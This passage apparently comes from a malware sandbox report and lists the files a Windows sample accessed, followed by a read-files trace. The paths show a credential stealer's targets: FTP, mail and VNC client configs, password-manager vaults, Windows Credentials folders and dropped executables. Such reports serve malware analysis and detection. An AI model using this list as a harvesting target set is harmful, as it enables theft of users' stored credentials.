Files (x86)\JaSFtp12\encPwd.jsd C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\encPwd.jsd C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\encPwd.jsd C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize7\encPwd.jsd C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize8\encPwd.jsd C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize9\encPwd.jsd C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize10\encPwd.jsd C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize11\encPwd.jsd C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize12\encPwd.jsd C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize13\encPwd.jsd C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize14\encPwd.jsd C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd C:\Users\Seven01\AppData\Roaming\Cyberduck C:\Users\Seven01\AppData\Roaming\iterate_GmbH C:\Users\Seven01\.config\fullsync\profiles.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg C:\Program Files (x86)\FileZilla\Filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\Staff-FTP\sites.ini C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat C:\Program Files (x86)\Fastream NETFile\My FTP Links C:\Program Files (x86)\GoFTP\settings\Connections.txt C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat C:\Program Files (x86)\DeluxeFTP\sites.xml C:\Windows\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\Program Files (x86)\FTPGetter\Profile\servers.xml C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml C:\Program Files (x86)\WS_FTP\WS_FTP.INI C:\Windows\WS_FTP.INI C:\Users\Seven01\AppData\Roaming\Ipswitch C:\Users\Seven01\site.xml C:\Users\Seven01\AppData\Local\PokerStars* C:\Users\Seven01\AppData\Local\ExpanDrive C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt C:\Users\Seven01\AppData\Roaming\FlashFXP C:\ProgramData\FlashFXP C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat C:\ProgramData\NetDrive2\drives.dat C:\Users\Seven01\AppData\Roaming\SmartFTP C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db C:\Users\Seven01\Documents\*.tlp C:\Users\Seven01\Documents\*.bscp C:\Users\Seven01\Documents\*.vnc C:\Users\Seven01\Desktop\*.vnc C:\Users\Seven01\Documents\mSecure C:\ProgramData\Syncovery C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP C:\Program Files (x86)\Foxmail\mail C:\Foxmail* C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini C:\Users\Seven01\Documents\Pocomail\accounts.ini C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail C:\Program Files (x86)\WinFtp Client\Favorites.dat C:\Windows\32BitFtp.TMP C:\Windows\32BitFtp.ini C:\FTP Navigator\Ftplist.txt C:\Softwarenetz\Mailing\Daten\mailing.vdt C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat C:\Users\Seven01\Documents\*Mailbox.ini C:\Users\Seven01\Documents\yMail2\POP3.xml C:\Users\Seven01\Documents\yMail2\SMTP.xml C:\Users\Seven01\Documents\yMail2\Accounts.xml C:\Users\Seven01\Documents\yMail\ymail.ini C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config C:\Users\Seven01\Documents\*.spn C:\Users\Seven01\Desktop\*.spn C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db C:\Users\Seven01\AppData\Roaming\stickies\images C:\Users\Seven01\AppData\Roaming\stickies\rtf C:\Users\Seven01\AppData\Roaming\NoteFly\notes C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt C:\Users\Seven01\Documents C:\Users\Seven01\Documents\*.kdbx C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\*.kdbx C:\Users\Seven01\Documents\*.kdb C:\Users\Seven01\Desktop\*.kdb C:\Users\Seven01\Documents\Enpass C:\Users\Seven01\Documents\My RoboForm Data C:\Users\Seven01\Documents\1Password C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL C:\Windows\System32\netapi32.dll C:\Users\Seven01\AppData\Local\Temp\netutils.dll C:\Windows\System32\netutils.dll C:\Users\Seven01\AppData\Local\Temp\srvcli.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Microsoft\Credentials C:\Users\Seven01\AppData\Local\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Temp\trip2323232.exe C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\Temp C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp C:\Windows\ServiceProfiles C:\Windows\ServiceProfiles\LocalService C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428 C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat C:\Windows\Fonts\arial.ttf C:\Windows\Fonts\ariali.ttf C:\Windows\Fonts\arialbd.ttf C:\Windows\Fonts\arialbi.ttf C:\Windows\Fonts\batang.ttc C:\Windows\Fonts\cour.ttf C:\Windows\Fonts\couri.ttf C:\Windows\Fonts\courbd.ttf C:\Windows\Fonts\courbi.ttf C:\Windows\Fonts\daunpenh.ttf C:\Windows\Fonts\dokchamp.ttf C:\Windows\Fonts\estre.ttf C:\Windows\Fonts\euphemia.ttf C:\Windows\Fonts\gautami.ttf C:\Windows\Fonts\gautamib.ttf C:\Windows\Fonts\Vani.ttf C:\Windows\Fonts\Vanib.ttf C:\Windows\Fonts\gulim.ttc C:\Windows\Fonts\impact.ttf C:\Windows\Fonts\iskpota.ttf C:\Windows\Fonts\iskpotab.ttf C:\Windows\Fonts\kalinga.ttf C:\Windows\Fonts\kalingab.ttf C:\Windows\Fonts\kartika.ttf C:\Windows\Fonts\kartikab.ttf C:\Windows\Fonts\KhmerUI.ttf C:\Windows\Fonts\KhmerUIb.ttf C:\Windows\Fonts\LaoUI.ttf C:\Windows\Fonts\LaoUIb.ttf C:\Windows\Fonts\latha.ttf C:\Windows\Fonts\lathab.ttf C:\Windows\Fonts\lucon.ttf C:\Windows\Fonts\malgun.ttf C:\Windows\Fonts\malgunbd.ttf C:\Windows\Fonts\mangal.ttf C:\Windows\Fonts\mangalb.ttf C:\Windows\Fonts\meiryo.ttc C:\Windows\Fonts\meiryob.ttc C:\Windows\Fonts\himalaya.ttf C:\Windows\Fonts\msjh.ttf C:\Windows\Fonts\msjhbd.ttf C:\Windows\Fonts\msyh.ttf C:\Windows\Fonts\msyhbd.ttf C:\Windows\Fonts\mingliu.ttc C:\Windows\Fonts\mingliub.ttc C:\Windows\Fonts\monbaiti.ttf C:\Windows\Fonts\msgothic.ttc C:\Windows\Fonts\msmincho.ttc C:\Windows\Fonts\mvboli.ttf C:\Windows\Fonts\ntailu.ttf C:\Windows\Fonts\ntailub.ttf C:\Windows\Fonts\nyala.ttf C:\Windows\Fonts\phagspa.ttf C:\Windows\Fonts\phagspab.ttf C:\Windows\Fonts\plantc.ttf C:\Windows\Fonts\raavi.ttf C:\Windows\Fonts\raavib.ttf C:\Windows\Fonts\segoesc.ttf C:\Windows\Fonts\segoescb.ttf C:\Windows\Fonts\segoeui.ttf C:\Windows\Fonts\segoeuib.ttf C:\Windows\Fonts\segoeuii.ttf C:\Windows\Fonts\segoeuiz.ttf C:\Windows\Fonts\seguisb.ttf C:\Windows\Fonts\segoeuil.ttf C:\Windows\Fonts\seguisym.ttf C:\Windows\Fonts\shruti.ttf C:\Windows\Fonts\shrutib.ttf C:\Windows\Fonts\simsun.ttc C:\Windows\Fonts\simsunb.ttf C:\Windows\Fonts\sylfaen.ttf C:\Windows\Fonts\taile.ttf C:\Windows\Fonts\taileb.ttf C:\Windows\Fonts\times.ttf C:\Windows\Fonts\timesi.ttf C:\Windows\Fonts\timesbd.ttf C:\Windows\Fonts\timesbi.ttf C:\Windows\Fonts\tunga.ttf C:\Windows\Fonts\tungab.ttf C:\Windows\Fonts\vrinda.ttf C:\Windows\Fonts\vrindab.ttf C:\Windows\Fonts\Shonar.ttf C:\Windows\Fonts\Shonarb.ttf C:\Windows\Fonts\msyi.ttf C:\Windows\Fonts\tahoma.ttf C:\Windows\Fonts\tahomabd.ttf C:\Windows\Fonts\micross.ttf C:\Windows\Fonts\angsa.ttf C:\Windows\Fonts\angsai.ttf C:\Windows\Fonts\angsab.ttf C:\Windows\Fonts\angsaz.ttf C:\Windows\Fonts\aparaj.ttf C:\Windows\Fonts\aparajb.ttf C:\Windows\Fonts\aparajbi.ttf C:\Windows\Fonts\aparaji.ttf C:\Windows\Fonts\cordia.ttf C:\Windows\Fonts\cordiai.ttf C:\Windows\Fonts\cordiab.ttf C:\Windows\Fonts\cordiaz.ttf C:\Windows\Fonts\ebrima.ttf C:\Windows\Fonts\ebrimabd.ttf C:\Windows\Fonts\gisha.ttf C:\Windows\Fonts\gishabd.ttf C:\Windows\Fonts\kokila.ttf C:\Windows\Fonts\kokilab.ttf C:\Windows\Fonts\kokilabi.ttf C:\Windows\Fonts\kokilai.ttf C:\Windows\Fonts\leelawad.ttf C:\Windows\Fonts\leelawdb.ttf C:\Windows\Fonts\msuighur.ttf C:\Windows\Fonts\moolbor.ttf C:\Windows\Fonts\symbol.ttf C:\Windows\Fonts\utsaah.ttf C:\Windows\Fonts\utsaahb.ttf C:\Windows\Fonts\utsaahbi.ttf C:\Windows\Fonts\utsaahi.ttf C:\Windows\Fonts\vijaya.ttf C:\Windows\Fonts\vijayab.ttf C:\Windows\Fonts\wingding.ttf C:\Windows\Fonts\modern.fon C:\Windows\Fonts\roman.fon C:\Windows\Fonts\script.fon C:\Windows\Fonts\andlso.ttf C:\Windows\Fonts\arabtype.ttf C:\Windows\Fonts\simpo.ttf C:\Windows\Fonts\simpbdo.ttf C:\Windows\Fonts\simpfxo.ttf C:\Windows\Fonts\majalla.ttf C:\Windows\Fonts\majallab.ttf C:\Windows\Fonts\trado.ttf C:\Windows\Fonts\tradbdo.ttf C:\Windows\Fonts\ahronbd.ttf C:\Windows\Fonts\david.ttf C:\Windows\Fonts\davidbd.ttf C:\Windows\Fonts\frank.ttf C:\Windows\Fonts\lvnm.ttf C:\Windows\Fonts\lvnmbd.ttf C:\Windows\Fonts\mriam.ttf C:\Windows\Fonts\mriamc.ttf C:\Windows\Fonts\nrkis.ttf C:\Windows\Fonts\rod.ttf C:\Windows\Fonts\simfang.ttf C:\Windows\Fonts\simhei.ttf C:\Windows\Fonts\simkai.ttf C:\Windows\Fonts\angsau.ttf C:\Windows\Fonts\angsaui.ttf C:\Windows\Fonts\angsaub.ttf C:\Windows\Fonts\angsauz.ttf C:\Windows\Fonts\browa.ttf C:\Windows\Fonts\browai.ttf C:\Windows\Fonts\browab.ttf C:\Windows\Fonts\browaz.ttf C:\Windows\Fonts\browau.ttf C:\Windows\Fonts\browaui.ttf C:\Windows\Fonts\browaub.ttf C:\Windows\Fonts\browauz.ttf C:\Windows\Fonts\cordiau.ttf C:\Windows\Fonts\cordiaub.ttf C:\Windows\Fonts\cordiauz.ttf C:\Windows\Fonts\cordiaui.ttf C:\Windows\Fonts\upcdl.ttf C:\Windows\Fonts\upcdi.ttf C:\Windows\Fonts\upcdb.ttf C:\Windows\Fonts\upcdbi.ttf C:\Windows\Fonts\upcel.ttf C:\Windows\Fonts\upcei.ttf C:\Windows\Fonts\upceb.ttf C:\Windows\Fonts\upcebi.ttf C:\Windows\Fonts\upcfl.ttf C:\Windows\Fonts\upcfi.ttf C:\Windows\Fonts\upcfb.ttf C:\Windows\Fonts\upcfbi.ttf C:\Windows\Fonts\upcil.ttf C:\Windows\Fonts\upcii.ttf C:\Windows\Fonts\upcib.ttf C:\Windows\Fonts\upcibi.ttf C:\Windows\Fonts\upcjl.ttf C:\Windows\Fonts\upcji.ttf C:\Windows\Fonts\upcjb.ttf C:\Windows\Fonts\upcjbi.ttf C:\Windows\Fonts\upckl.ttf C:\Windows\Fonts\upcki.ttf C:\Windows\Fonts\upckb.ttf C:\Windows\Fonts\upckbi.ttf C:\Windows\Fonts\upcll.ttf C:\Windows\Fonts\upcli.ttf C:\Windows\Fonts\upclb.ttf C:\Windows\Fonts\upclbi.ttf C:\Windows\Fonts\kaiu.ttf C:\Windows\Fonts\l_10646.ttf C:\Windows\Fonts\ariblk.ttf C:\Windows\Fonts\calibri.ttf C:\Windows\Fonts\calibrii.ttf C:\Windows\Fonts\calibrib.ttf C:\Windows\Fonts\calibriz.ttf C:\Windows\Fonts\cambria.ttc C:\Windows\Fonts\cambriai.ttf C:\Windows\Fonts\cambriab.ttf C:\Windows\Fonts\cambriaz.ttf C:\Windows\Fonts\Candara.ttf C:\Windows\Fonts\Candarai.ttf C:\Windows\Fonts\Candarab.ttf C:\Windows\Fonts\Candaraz.ttf C:\Windows\Fonts\comic.ttf C:\Windows\Fonts\comicbd.ttf C:\Windows\Fonts\consola.ttf C:\Windows\Fonts\consolai.ttf C:\Windows\Fonts\consolab.ttf C:\Windows\Fonts\consolaz.ttf C:\Windows\Fonts\constan.ttf C:\Windows\Fonts\constani.ttf C:\Windows\Fonts\constanb.ttf C:\Windows\Fonts\constanz.ttf C:\Windows\Fonts\corbel.ttf C:\Windows\Fonts\corbeli.ttf C:\Windows\Fonts\corbelb.ttf C:\Windows\Fonts\corbelz.ttf C:\Windows\Fonts\framd.ttf C:\Windows\Fonts\framdit.ttf C:\Windows\Fonts\Gabriola.ttf C:\Windows\Fonts\georgia.ttf C:\Windows\Fonts\georgiai.ttf C:\Windows\Fonts\georgiab.ttf C:\Windows\Fonts\georgiaz.ttf C:\Windows\Fonts\pala.ttf C:\Windows\Fonts\palai.ttf C:\Windows\Fonts\palab.ttf C:\Windows\Fonts\palabi.ttf C:\Windows\Fonts\segoepr.ttf C:\Windows\Fonts\segoeprb.ttf C:\Windows\Fonts\trebuc.ttf C:\Windows\Fonts\trebucit.ttf C:\Windows\Fonts\trebucbd.ttf C:\Windows\Fonts\trebucbi.ttf C:\Windows\Fonts\verdana.ttf C:\Windows\Fonts\verdanai.ttf C:\Windows\Fonts\verdanab.ttf C:\Windows\Fonts\verdanaz.ttf C:\Windows\Fonts\webdings.ttf C:\Windows\Fonts\coure.fon C:\Windows\Fonts\serife.fon C:\Windows\Fonts\sserife.fon C:\Windows\Fonts\smalle.fon C:\Windows\Fonts\smallf.fon C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF C:\Windows\Fonts\ARIALUNI.TTF C:\Windows\Fonts\CENTURY.TTF C:\Windows\Fonts\WINGDNG2.TTF C:\Windows\Fonts\WINGDNG3.TTF C:\Windows\Fonts\BKANT.TTF C:\Windows\Fonts\GOTHIC.TTF C:\Windows\Fonts\OUTLOOK.TTF C:\Windows\Fonts\TEMPSITC.TTF C:\Windows\Fonts\MISTRAL.TTF C:\Windows\Fonts\LHANDW.TTF C:\Windows\Fonts\ITCKRIST.TTF C:\Windows\Fonts\JUICE___.TTF C:\Windows\Fonts\FREESCPT.TTF C:\Windows\Fonts\ARIALN.TTF C:\Windows\Fonts\GARA.TTF C:\Windows\Fonts\MTCORSVA.TTF C:\Windows\Fonts\ALGER.TTF C:\Windows\Fonts\BASKVILL.TTF C:\Windows\Fonts\BAUHS93.TTF C:\Windows\Fonts\BELL.TTF C:\Windows\Fonts\BRLNSB.TTF C:\Windows\Fonts\BERNHC.TTF C:\Windows\Fonts\BOD_PSTC.TTF C:\Windows\Fonts\BRITANIC.TTF C:\Windows\Fonts\BROADW.TTF C:\Windows\Fonts\BRUSHSCI.TTF C:\Windows\Fonts\CALIFR.TTF C:\Windows\Fonts\CENTAUR.TTF C:\Windows\Fonts\CHILLER.TTF C:\Windows\Fonts\COLONNA.TTF C:\Windows\Fonts\COOPBL.TTF C:\Windows\Fonts\FTLTLT.TTF C:\Windows\Fonts\HARLOWSI.TTF C:\Windows\Fonts\HARNGTON.TTF C:\Windows\Fonts\HTOWERT.TTF C:\Windows\Fonts\JOKERMAN.TTF C:\Windows\Fonts\KUNSTLER.TTF C:\Windows\Fonts\LBRITE.TTF C:\Windows\Fonts\LCALLIG.TTF C:\Windows\Fonts\LFAX.TTF C:\Windows\Fonts\MAGNETOB.TTF C:\Windows\Fonts\MATURASC.TTF C:\Windows\Fonts\MOD20.TTF C:\Windows\Fonts\NIAGENG.TTF C:\Windows\Fonts\NIAGSOL.TTF C:\Windows\Fonts\OLDENGL.TTF C:\Windows\Fonts\ONYX.TTF C:\Windows\Fonts\PARCHM.TTF C:\Windows\Fonts\PLAYBILL.TTF C:\Windows\Fonts\POORICH.TTF C:\Windows\Fonts\RAVIE.TTF C:\Windows\Fonts\INFROMAN.TTF C:\Windows\Fonts\SHOWG.TTF C:\Windows\Fonts\SNAP____.TTF C:\Windows\Fonts\STENCIL.TTF C:\Windows\Fonts\VINERITC.TTF C:\Windows\Fonts\VIVALDII.TTF C:\Windows\Fonts\VLADIMIR.TTF C:\Windows\Fonts\LATINWD.TTF C:\Windows\Fonts\BOOKOS.TTF C:\Windows\Fonts\ANTQUAB.TTF C:\Windows\Fonts\ANTQUABI.TTF C:\Windows\Fonts\ANTQUAI.TTF C:\Windows\Fonts\GOTHICB.TTF C:\Windows\Fonts\GOTHICBI.TTF C:\Windows\Fonts\GOTHICI.TTF C:\Windows\Fonts\BSSYM7.TTF C:\Windows\Fonts\REFSAN.TTF C:\Windows\Fonts\REFSPCL.TTF C:\Windows\Fonts\ARIALNB.TTF C:\Windows\Fonts\ARIALNBI.TTF C:\Windows\Fonts\ARIALNI.TTF C:\Windows\Fonts\GARABD.TTF C:\Windows\Fonts\GARAIT.TTF C:\Windows\Fonts\BELLB.TTF C:\Windows\Fonts\BELLI.TTF C:\Windows\Fonts\BRLNSDB.TTF C:\Windows\Fonts\BRLNSR.TTF C:\Windows\Fonts\CALIFB.TTF C:\Windows\Fonts\CALIFI.TTF C:\Windows\Fonts\HTOWERTI.TTF C:\Windows\Fonts\LBRITED.TTF C:\Windows\Fonts\LBRITEDI.TTF C:\Windows\Fonts\LBRITEI.TTF C:\Windows\Fonts\LFAXD.TTF C:\Windows\Fonts\LFAXDI.TTF C:\Windows\Fonts\LFAXI.TTF C:\Windows\Fonts\BOOKOSB.TTF C:\Windows\Fonts\BOOKOSBI.TTF C:\Windows\Fonts\BOOKOSI.TTF C:\Windows\Fonts\marlett.ttf \??\PIPE\wkssvc C:\DosDevices\pipe\ C:\Windows\sysnative\dfdts.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx C:\Windows\sysnative\winevt\Logs\System.evtx C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx C:\Windows\sysnative\wbem\WinMgmtR.dll C:\Windows\sysnative\shell32.dll C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx C:\Windows\sysnative\oleres.dll C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui C:\Windows\sysnative\dfdts.dll.manifest C:\Windows\sysnative\dfdts.dll.123.Manifest C:\Windows\sysnative\dfdts.dll.124.Manifest C:\Windows\sysnative\dfdts.dll.2.Manifest C:\Windows\sysnative\rundll32.exe C:\ProgramData\Microsoft\Windows\Sqm\Sessions C:\ProgramData\Microsoft\Windows\Sqm\Sessions\*.psqm C:\ProgramData\Microsoft\Windows\Sqm\Upload C:\ProgramData\Microsoft\Windows\Sqm\Upload\*.sqm C:\ProgramData\Microsoft\Windows\Sqm\Manifest C:\ProgramData\Microsoft\Windows\Sqm\Manifest\*.bin C:\Windows\sysnative\LogFiles\SQM C:\Windows\sysnative\LogFiles\SQM\SqmLogger*.etl.* C:\Windows\sysnative\Tasks C:\Windows\sysnative\Tasks\* C:\Windows\sysnative\Tasks\Adobe Flash Player Updater C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader C:\Windows\sysnative\advapi32.dll C:\Windows\sysnative\it-IT\advapi32.dll.mui C:\Windows\sysnative\drivers\acpi.sys C:\Windows\sysnative\drivers\it-IT\ACPI.sys.mui C:\Windows\sysnative\drivers\ndis.sys C:\Windows\sysnative\drivers\it-IT\ndis.sys.mui C:\Windows\sysnative\drivers\mssmbios.sys C:\Windows\sysnative\drivers\it-IT\mssmbios.sys.mui C:\Windows\sysnative\drivers\hdaudbus.sys C:\Windows\sysnative\drivers\it-IT\HDAudBus.sys.mui C:\Windows\sysnative\drivers\intelppm.sys C:\Windows\sysnative\drivers\it-IT\intelppm.sys.mui C:\Windows\sysnative\drivers\portcls.sys C:\Windows\sysnative\drivers\it-IT\portcls.SYS.mui C:\Windows\sysnative\drivers\monitor.sys C:\Windows\sysnative\drivers\it-IT\monitor.sys C:\Windows\sysnative\drivers\it\monitor.sys \??\MountPointManager C:\Windows\sysnative\wbem\WMIADAP.exe C:\Windows\sysnative C:\Windows\sysnative\wbem C:\Windows\appcompat\Programs\RecentFileCache.bcf C:\Windows\AppPatch\AppPatch64\sysmain.sdb C:\Windows\sysnative\wbem\ C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64 C:\Windows\AppPatch\sysmain.sdb C:\Windows\SysWOW64\ C:\Windows\SysWOW64\*.* C:\Windows\SysWOW64\ui\SwDRM.dll C:\Windows\SysWOW64\net1.exe C:\Windows\Temp\fwtsqmfile00.sqm C:\Windows\Temp\fwtsqmfile01.sqm C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\it-IT\sc.exe.mui C:\Windows\sysnative\wbem\WmiPrvSE.exe C:\Windows\sysnative\wbem\MOF C:\Windows\sysnative\wbem\MOF\bad\ C:\Windows\sysnative\wbem\MOF\good\ C:\Windows\sysnative\wbem\MOF\* \??\WMIDataDevice C:\Windows\sysnative\it-IT\VssTrace.DLL.mui \??\PIPE\samr C:\Windows\sysnative\wbem\repository C:\Windows\sysnative\wbem\Logs C:\Windows\sysnative\wbem\AutoRecover C:\Windows\sysnative\wbem\repository\INDEX.BTR C:\Windows\sysnative\wbem\repository\WRITABLE.TST C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER C:\Windows\sysnative\it-IT\USER32.dll.mui C:\Windows\sysnative\it-IT\ADVAPI32.dll.mui C:\Windows\sysnative\wbem\it-IT\mofd.dll.mui
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.config C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol36.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll 